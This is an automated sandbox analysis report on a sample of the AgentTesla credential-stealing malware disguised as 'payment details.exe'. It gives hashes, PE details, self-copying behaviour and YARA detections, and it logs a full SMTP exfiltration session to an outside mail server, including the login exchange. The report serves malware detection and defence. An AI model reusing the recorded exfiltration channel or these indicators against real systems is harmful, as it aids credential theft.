                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:payment details.exe
                                              File size:729600
                                              MD5:55191839573ac8fd25655b3561286bc1
                                              SHA1:b9e85e2ab05e4b027a3f522fd690b097aa4a4aad
                                              SHA256:e81d917830f3fabca0557b899267ebe84ecc6fcbb5e1cd649284d1370d8a8876
                                              SHA512:3488ab665aedfec80b744e403c8a0772097608c679e62b4cce77103b2b3efdad262e41cda0f579533c4d8c061aacf9963a61ab90053fbdf58f70f67685a69c84
                                              SSDEEP:12288:wfBr6Pu2iNXNKJSjlVQp9Tjj7pqA8C8veXh+R7QrRLqQsm2T8TJjHEM0Eyxf3:+ruu1lNhK9Tn7YESQK0rR6f8TJuV3
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WZn`..............0..............6... ...@....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4b3616
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x606E5A57 [Thu Apr 8 01:20:23 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              mov dword ptr [eax+4Eh], edx
                                              inc edi
                                              or eax, 000A1A0Ah
                                              add byte ptr [eax], al
                                              add byte ptr [ecx+45h], cl
                                              dec esi
                                              inc esp
                                              scasb
                                              inc edx
                                              pushad
                                              add byte ptr [eax], 00000000h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb35c40x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x5bc.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb16340xb1800False0.90361328125data7.89257156143IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb40000x5bc0x600False0.430338541667data4.18044919538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xb60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0xb40900x32cdata
                                              RT_MANIFEST0xb43cc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2018 - 2021
                                              Assembly Version3.1.0.5
                                              InternalNameE7.exe
                                              FileVersion3.1.0.5
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductNameImage Manager
                                              ProductVersion3.1.0.5
                                              FileDescriptionImage Manager
                                              OriginalFilenameE7.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/08/21-12:13:03.957380ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                              04/08/21-12:14:14.478900TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49764587192.168.2.469.65.3.206

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 12:14:13.416610003 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:13.529042006 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:13.529160023 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:13.782218933 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:13.783303976 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:13.896219969 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:13.897735119 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.012175083 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.012785912 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.135514021 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.136495113 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.248852015 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.249553919 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.362612963 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.363524914 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.475619078 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.475667953 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.478899956 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.479218006 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.479986906 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.480148077 CEST49764587192.168.2.469.65.3.206
                                              Apr 8, 2021 12:14:14.591240883 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:14.591269016 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:15.217732906 CEST5874976469.65.3.206192.168.2.4
                                              Apr 8, 2021 12:14:15.270230055 CEST49764587192.168.2.469.65.3.206

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 12:12:03.064060926 CEST6529853192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:03.077512980 CEST53652988.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:03.845468998 CEST5912353192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:03.858165026 CEST53591238.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:04.593974113 CEST5453153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:04.606405020 CEST53545318.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:05.538863897 CEST4971453192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:05.558337927 CEST53497148.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:05.890345097 CEST5802853192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:05.903453112 CEST53580288.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:06.565275908 CEST5309753192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:06.578464985 CEST53530978.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:07.659887075 CEST4925753192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:07.673106909 CEST53492578.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:08.621151924 CEST6238953192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:08.633485079 CEST53623898.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:09.517817974 CEST4991053192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:09.530227900 CEST53499108.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:10.398554087 CEST5585453192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:10.411314964 CEST53558548.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:11.768969059 CEST6454953192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:11.781416893 CEST53645498.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:29.372864962 CEST6315353192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:29.385481119 CEST53631538.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:30.782634020 CEST5299153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:30.798058033 CEST53529918.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:31.834743023 CEST5370053192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:31.846843004 CEST53537008.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:32.547606945 CEST5172653192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:32.561222076 CEST53517268.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:33.321407080 CEST5679453192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:33.334260941 CEST53567948.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:34.282865047 CEST5653453192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:34.296099901 CEST53565348.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:35.276427031 CEST5662753192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:35.289624929 CEST53566278.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:37.214466095 CEST5662153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:37.227308035 CEST53566218.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:40.079788923 CEST6311653192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:40.092431068 CEST53631168.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:45.115417957 CEST6407853192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:45.135452986 CEST53640788.8.8.8192.168.2.4
                                              Apr 8, 2021 12:12:56.673142910 CEST6480153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:12:56.691920042 CEST53648018.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:01.490715027 CEST6172153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:01.625912905 CEST53617218.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:02.216861963 CEST5125553192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:02.229913950 CEST53512558.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:02.821137905 CEST6152253192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:03.873179913 CEST6152253192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:03.886499882 CEST53615228.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:03.957209110 CEST53615228.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:04.867223978 CEST5233753192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:04.880508900 CEST53523378.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:06.228488922 CEST5504653192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:06.326831102 CEST53550468.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:06.883766890 CEST4961253192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:06.896733046 CEST53496128.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:07.279181004 CEST4928553192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:07.292699099 CEST53492858.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:07.457143068 CEST5060153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:07.470500946 CEST53506018.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:08.050573111 CEST6087553192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:08.063374996 CEST53608758.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:09.544285059 CEST5644853192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:09.557113886 CEST53564488.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:09.907948017 CEST5917253192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:09.923392057 CEST53591728.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:19.272897005 CEST6242053192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:19.290817976 CEST53624208.8.8.8192.168.2.4
                                              Apr 8, 2021 12:13:57.243844986 CEST6057953192.168.2.48.8.8.8
                                              Apr 8, 2021 12:13:57.279443979 CEST53605798.8.8.8192.168.2.4
                                              Apr 8, 2021 12:14:02.344350100 CEST5018353192.168.2.48.8.8.8
                                              Apr 8, 2021 12:14:02.371304035 CEST53501838.8.8.8192.168.2.4
                                              Apr 8, 2021 12:14:12.552082062 CEST6153153192.168.2.48.8.8.8
                                              Apr 8, 2021 12:14:12.682018995 CEST53615318.8.8.8192.168.2.4
                                              Apr 8, 2021 12:14:13.157211065 CEST4922853192.168.2.48.8.8.8
                                              Apr 8, 2021 12:14:13.277036905 CEST53492288.8.8.8192.168.2.4

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Apr 8, 2021 12:13:03.957380056 CEST192.168.2.48.8.8.8d138(Port unreachable)Destination Unreachable

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Apr 8, 2021 12:14:12.552082062 CEST192.168.2.48.8.8.80xb2ddStandard query (0)mail.almasroor.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 12:14:13.157211065 CEST192.168.2.48.8.8.80x70e6Standard query (0)mail.almasroor.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Apr 8, 2021 12:14:12.682018995 CEST8.8.8.8192.168.2.40xb2ddNo error (0)mail.almasroor.comalmasroor.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 12:14:12.682018995 CEST8.8.8.8192.168.2.40xb2ddNo error (0)almasroor.com69.65.3.206A (IP address)IN (0x0001)
                                              Apr 8, 2021 12:14:13.277036905 CEST8.8.8.8192.168.2.40x70e6No error (0)mail.almasroor.comalmasroor.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 12:14:13.277036905 CEST8.8.8.8192.168.2.40x70e6No error (0)almasroor.com69.65.3.206A (IP address)IN (0x0001)

                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Apr 8, 2021 12:14:13.782218933 CEST5874976469.65.3.206192.168.2.4220-server302.webhostingpad.com ESMTP Exim 4.93 #2 Thu, 08 Apr 2021 05:14:13 -0500
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 8, 2021 12:14:13.783303976 CEST49764587192.168.2.469.65.3.206EHLO 247525
                                              Apr 8, 2021 12:14:13.896219969 CEST5874976469.65.3.206192.168.2.4250-server302.webhostingpad.com Hello 247525 [185.32.222.8]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 8, 2021 12:14:13.897735119 CEST49764587192.168.2.469.65.3.206AUTH login aG9AYWxtYXNyb29yLmNvbQ==
                                              Apr 8, 2021 12:14:14.012175083 CEST5874976469.65.3.206192.168.2.4334 UGFzc3dvcmQ6
                                              Apr 8, 2021 12:14:14.135514021 CEST5874976469.65.3.206192.168.2.4235 Authentication succeeded
                                              Apr 8, 2021 12:14:14.136495113 CEST49764587192.168.2.469.65.3.206MAIL FROM:<ho@almasroor.com>
                                              Apr 8, 2021 12:14:14.248852015 CEST5874976469.65.3.206192.168.2.4250 OK
                                              Apr 8, 2021 12:14:14.249553919 CEST49764587192.168.2.469.65.3.206RCPT TO:<ho@almasroor.com>
                                              Apr 8, 2021 12:14:14.362612963 CEST5874976469.65.3.206192.168.2.4250 Accepted
                                              Apr 8, 2021 12:14:14.363524914 CEST49764587192.168.2.469.65.3.206DATA
                                              Apr 8, 2021 12:14:14.475667953 CEST5874976469.65.3.206192.168.2.4354 Enter message, ending with "." on a line by itself
                                              Apr 8, 2021 12:14:14.480148077 CEST49764587192.168.2.469.65.3.206.
                                              Apr 8, 2021 12:14:15.217732906 CEST5874976469.65.3.206192.168.2.4250 OK id=1lURfy-0003vO-DX

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:12:12:11
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\payment details.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\payment details.exe'
                                              Imagebase:0x800000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:12:12:25
                                              Start date:08/04/2021
                                              Path:C:\Users\user\Desktop\payment details.exe
                                              Wow64 process (32bit):true
                                              Commandline:{path}
                                              Imagebase:0x620000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:12:13:03
                                              Start date:08/04/2021
                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                              Imagebase:0x3c0000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.795750062.00000000037E9000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 33%, ReversingLabs
                                              Reputation:low

                                              General

                                              Start time:12:13:11
                                              Start date:08/04/2021
                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                              Imagebase:0x7f0000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.816268269.0000000003C09000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:12:13:16
                                              Start date:08/04/2021
                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              Wow64 process (32bit):true
                                              Commandline:{path}
                                              Imagebase:0xc40000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.817039638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:12:13:25
                                              Start date:08/04/2021
                                              Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              Wow64 process (32bit):true
                                              Commandline:{path}
                                              Imagebase:0xc00000
                                              File size:729600 bytes
                                              MD5 hash:55191839573AC8FD25655B3561286BC1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: #\ $#\ $~vN$~vN
                                                • API String ID: 0-3344656951
                                                • Opcode ID: 5ba82a039023f6f23bbb52260d1ae8fe2c8019f2558f7e1565fe6040744bee64
                                                • Instruction ID: 95ec865daf8d1a071c59287a509c07aa4bdb43adc3fdac73f910daebcdb77f48
                                                • Opcode Fuzzy Hash: 5ba82a039023f6f23bbb52260d1ae8fe2c8019f2558f7e1565fe6040744bee64
                                                • Instruction Fuzzy Hash: EB618A74D2A209DFCB08CFA5E9816EEFBF6AF89310F64A42AE005B7254D3744946CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: sow=$_.
                                                • API String ID: 0-2600230314
                                                • Opcode ID: 3880beabfe733fe780bd9410a3ead4dbab5917370f19d16a002868f25f6ac7e6
                                                • Instruction ID: 7ef96ad1794847bbd07708e510b847e67bee53bc0ef3528a45a59ad1490b31be
                                                • Opcode Fuzzy Hash: 3880beabfe733fe780bd9410a3ead4dbab5917370f19d16a002868f25f6ac7e6
                                                • Instruction Fuzzy Hash: FCB113B4E14219CBCB04CFAAC98159EFBF2FF89310F64D52AD509AB315E7349942CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: sow=$_.
                                                • API String ID: 0-2600230314
                                                • Opcode ID: 291400da5f255405900f476eb9fae79300989d80973025e9baf35534a9cdc4c1
                                                • Instruction ID: 0fb3ed9abd629dcbfc0c6e13a3c4e0c5d39469e108b88569e2ce50b140813a19
                                                • Opcode Fuzzy Hash: 291400da5f255405900f476eb9fae79300989d80973025e9baf35534a9cdc4c1
                                                • Instruction Fuzzy Hash: C0B124B4E14219CBCB04CFAAC98159EFBF2FF89310F68D16AC405AB355E7349942CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: #\ $#\
                                                • API String ID: 0-834825757
                                                • Opcode ID: e964c35d33a77606e0df8cf071963235205c36f2d8093a881d9b29a18cc2971a
                                                • Instruction ID: 91e3c9d5fe3ad21f305ac4986d7adba8d75a655c4f22758feb877662bb17fb3a
                                                • Opcode Fuzzy Hash: e964c35d33a77606e0df8cf071963235205c36f2d8093a881d9b29a18cc2971a
                                                • Instruction Fuzzy Hash: CA617B74D26209DFCB04CFA5E9816DEFBF6AF89310F24A42AE405B7254D3748945CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: !$UG
                                                • API String ID: 0-704283737
                                                • Opcode ID: 2fecec519541bb6402316f387278df827b73337b75ac64e98c90f6aaeef983b3
                                                • Instruction ID: f638ccc955327cd8baf6fecc868f93bca92cf6b342a1c63069e1329f74700b6d
                                                • Opcode Fuzzy Hash: 2fecec519541bb6402316f387278df827b73337b75ac64e98c90f6aaeef983b3
                                                • Instruction Fuzzy Hash: 39C13774E1562ACBDB24CF65C884BDAFBB2FF98300F5481EAC509A7254EB745A81CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: !$UG
                                                • API String ID: 0-704283737
                                                • Opcode ID: b0c20e8b96256da4c612ad6303fda12dbcefe6729cfeb2816e820add4c20428f
                                                • Instruction ID: e5c18d8712c36a3aef309f8f598341eb970e5328f9c3ccafaa33f66bf7eed7b2
                                                • Opcode Fuzzy Hash: b0c20e8b96256da4c612ad6303fda12dbcefe6729cfeb2816e820add4c20428f
                                                • Instruction Fuzzy Hash: CE812B75D1462ACBDB24CF66C944BDAFBB2BF98300F14C2EAC509A7255EB745A81CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.690414949.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
